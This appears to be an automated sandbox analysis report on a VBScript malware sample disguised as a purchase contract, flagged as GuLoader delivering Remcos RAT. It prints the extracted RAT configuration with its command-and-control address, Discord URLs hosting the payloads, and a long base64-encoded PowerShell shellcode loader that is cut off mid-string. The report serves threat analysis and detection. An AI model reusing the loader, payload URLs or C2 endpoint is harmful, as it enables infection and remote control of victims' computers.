Windows Analysis Report
tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs

Overview

General Information

Sample Name: tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
Analysis ID: 560422
MD5: b8fbb413a49b2f05872cb38372454664
SHA1: 2071d3476c94b3cfc924b31c705806e78df674a8
SHA256: cffa320db9834e3f224aa5961073fc9d0cb14f34c6430ffa2d7468da7da7ce32
Infos:

Detection

Remcos GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Remcos RAT
Detected Remcos RAT
Yara detected GuLoader
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000019.00000002.398154379475.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://cdn.discordapp.com/attachments/933089228261294143/9"}
Source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "i;j49.123:2404:194.130.249.123:4687:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-WPACZI", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
Yara detected Remcos RAT
Source: Yara match File source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.398543699572.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398100700330.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 2008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 6628, type: MEMORYSTR
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49829 version: TLS 1.2

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://cdn.discordapp.com/attachments/933089228261294143/9
Source: Malware configuration extractor URLs: i;j49.123
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.159.133.233 162.159.133.233
Source: Joe Sandbox View IP Address: 162.159.133.233 162.159.133.233
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49819 -> 94.130.249.123:2404
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown TCP traffic detected without corresponding DNS query: 94.130.249.123
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: ieinstal.exe, 00000011.00000003.397078792955.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: ieinstal.exe, 00000011.00000003.397078792955.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png$
Source: powershell.exe, 00000004.00000002.397124852706.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.398643865938.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398107972991.00000000052A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398548806437.0000000004B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html$
Source: powershell.exe, 00000004.00000002.397124852706.0000000004A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB6m
Source: powershell.exe, 00000015.00000002.398643865938.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.398107972991.00000000052A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.398548806437.0000000004B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBAm
Source: ieinstal.exe, 00000011.00000002.401403794938.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/1s
Source: ieinstal.exe, 00000021.00000002.398544109967.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000021.00000002.398542601563.000000000362B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin&
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binb
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bing
Source: ieinstal.exe, 00000021.00000002.398541662516.00000000035E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binn32
Source: ieinstal.exe, 00000021.00000002.398541662516.00000000035E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.binnmd
Source: ieinstal.exe, 00000021.00000002.398542601563.000000000362B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bino
Source: ieinstal.exe, 00000011.00000002.401434029761.000000001EA64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bins
Source: ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bint
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011752798.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404217250.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpg
Source: ieinstal.exe, 00000011.00000002.401407177634.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpgS
Source: ieinstal.exe, 00000011.00000002.401403794938.0000000002D88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/c
Source: ieinstal.exe, 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/k-?
Source: ieinstal.exe, 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/p
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.397127576190.0000000004C98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester$
Source: powershell.exe, 00000004.00000002.397140404405.0000000005AED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/933089228261294143/933089306719961188/IMG_25254535627256.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/933089029631639657/933089094899228722/4687_OIhOpvia11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.11.20:49829 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000021.00000002.398543103600.0000000003650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.398543699572.00000000036A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398099554882.0000000003294000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.398100700330.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 2008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 4696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ieinstal.exe PID: 6628, type: MEMORYSTR

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAb